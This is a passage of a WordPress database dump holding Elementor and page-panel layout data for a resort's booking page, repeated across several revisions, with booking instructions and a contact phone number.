radient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Book your vacation\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"90a8733\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630c297\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d1b6305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"35bf2b4\"}]},\"elements\":[{\"id\":\"736fef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8f92b24\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d513b8a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74df4fb\"}]},\"elements\":[{\"id\":\"b62ea51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">If the date you really wanted is booked call us and we can notify you if it becomes available.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2640,837,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2646,851,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:7:{s:6:\"visual\";b:0;s:5:\"title\";s:35:\"CALL FOR AVAILABILITY 218-747-2959.\";s:4:\"text\";s:438:\"Book your stay by calling (218) 747-2959. The calendar is up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"a3341bb8-5b40-4200-adc9-7ee4acb51ee2\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:6:\"filter\";b:0;s:22:\"so_sidebar_emulator_id\";s:13:\"text-85110000\";s:11:\"option_name\";s:11:\"widget_text\";}i:1;a:8:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:13:\"BookingWidget\";s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"b899f0e7-1b45-4c75-b586-28eb4cc2f24b\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:19:\"booking_widget_type\";s:0:\"\";s:22:\"so_sidebar_emulator_id\";s:22:\"bookingwidget-85110001\";s:11:\"option_name\";s:20:\"widget_bookingwidget\";}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;s:5:\"style\";a:0:{}}}}'),(2647,852,'panels_data','a:3:{s:7:\"widgets\";a:2:{i:0;a:7:{s:6:\"visual\";b:0;s:5:\"title\";s:35:\"CALL FOR AVAILABILITY 218-747-2959.\";s:4:\"text\";s:438:\"Book your stay by calling (218) 747-2959. The calendar is up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n\";s:6:\"filter\";b:0;s:22:\"so_sidebar_emulator_id\";s:12:\"text-8810000\";s:11:\"option_name\";s:11:\"widget_text\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:14:\"WP_Widget_Text\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"a3341bb8-5b40-4200-adc9-7ee4acb51ee2\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:8:{s:20:\"booking_widget_title\";s:0:\"\";s:19:\"booking_widget_show\";s:12:\"booking_form\";s:29:\"booking_widget_calendar_count\";s:1:\"1\";s:25:\"booking_widget_last_field\";s:0:\"\";s:19:\"booking_widget_type\";s:0:\"\";s:22:\"so_sidebar_emulator_id\";s:21:\"bookingwidget-8810001\";s:11:\"option_name\";s:20:\"widget_bookingwidget\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:13:\"BookingWidget\";s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"b899f0e7-1b45-4c75-b586-28eb4cc2f24b\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:2:{s:5:\"cells\";i:2;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.77279005524900001855570508269011043012142181396484375;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.2272099447510000091998705329388030804693698883056640625;s:5:\"style\";a:0:{}}}}'),(2648,853,'vantage_panels_no_legacy','true'),(2649,853,'_menu_item_type','post_type'),(2650,853,'_menu_item_menu_item_parent','44'),(2651,853,'_menu_item_object_id','837'),(2652,853,'_menu_item_object','page'),(2653,853,'_menu_item_target',''),(2654,853,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2655,853,'_menu_item_xfn',''),(2656,853,'_menu_item_url',''),(2666,855,'_elementor_edit_mode','builder'),(2667,855,'_elementor_template_type','post'),(2668,855,'_elementor_version','2.5.16'),(2669,855,'_wp_page_template','default'),(2670,855,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Book your vacation\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"90a8733\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630c297\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d1b6305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"35bf2b4\"}]},\"elements\":[{\"id\":\"736fef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8f92b24\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d513b8a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74df4fb\"}]},\"elements\":[{\"id\":\"b62ea51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>IBook your stay by calling (218) 747-2959. The calendar is up to date showing availability.<\\/p><p>You can also send a request for booking by filling out this form below and selecting the days you wish to stay in the calendar on the right.<br \\/>We will call you to confirm Reservation.<br \\/>Remember that a deposit is required before a booking can be confirmed. <br \\/>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2671,855,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2674,856,'_elementor_edit_mode','builder'),(2675,856,'_elementor_template_type','post'),(2676,856,'_elementor_version','2.5.16'),(2677,856,'_wp_page_template','default'),(2678,856,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request a Booking\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"90a8733\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630c297\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d1b6305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"35bf2b4\"}]},\"elements\":[{\"id\":\"736fef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8f92b24\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d513b8a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74df4fb\"}]},\"elements\":[{\"id\":\"b62ea51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>IBook your stay by calling (218) 747-2959. The calendar is up to date showing availability.<\\/p>\\n<p>You can also send a request for booking&nbsp; online by clicking Request a Booking above.<br>We will call you to confirm Reservation.<br>Remember that a deposit is required before a booking can be confirmed. <br>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2679,856,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2682,857,'_elementor_edit_mode','builder'),(2683,857,'_elementor_template_type','post'),(2684,857,'_elementor_version','2.5.16'),(2685,857,'_wp_page_template','default'),(2686,857,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request a Booking\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"90a8733\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630c297\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d1b6305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"35bf2b4\"}]},\"elements\":[{\"id\":\"736fef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8f92b24\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d513b8a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74df4fb\"}]},\"elements\":[{\"id\":\"b62ea51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Book your stay by calling (218) 747-2959. The calendar is up to date showing availability.<\\/p>\\n<p>You can also send a request for booking&nbsp; online by clicking Request a Booking above.<br>We will call you to confirm Reservation.<br>Remember that a deposit is required before a booking can be confirmed. <br>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2687,857,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2690,858,'_elementor_edit_mode','builder'),(2691,858,'_elementor_template_type','post'),(2692,858,'_elementor_version','2.5.16'),(2693,858,'_wp_page_template','default'),(2694,858,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>X = Booked Dates in Upcoming Vacation Calendar<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request a Booking\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"90a8733\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630c297\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d1b6305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"35bf2b4\"}]},\"elements\":[{\"id\":\"736fef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8f92b24\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d513b8a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74df4fb\"}]},\"elements\":[{\"id\":\"b62ea51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Book your stay by calling (218) 747-2959. The calendar below is updated to date showing availability.<\\/p>\\n<p>You can also send a request for booking&nbsp; online by clicking Request a Booking above.<br>We will call you to confirm Reservation.<br>Remember that a deposit is required before a booking can be confirmed. <br>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2695,858,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2698,859,'_elementor_edit_mode','builder'),(2699,859,'_elementor_template_type','post'),(2700,859,'_elementor_version','2.5.16'),(2701,859,'_wp_page_template','default'),(2702,859,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_